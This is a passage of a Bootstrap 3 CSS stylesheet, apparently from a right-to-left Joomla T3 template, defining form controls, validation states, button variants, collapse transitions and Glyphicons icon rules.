  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-right: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-right: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-left: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-right: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: left;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  left: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #005788;
  border-color: #001622;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #005788;
  border-color: #004064;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #005788;
  background-image: none;
  border-color: #004064;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #004064;
  border-color: #001622;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #0077bb;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #00466e;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
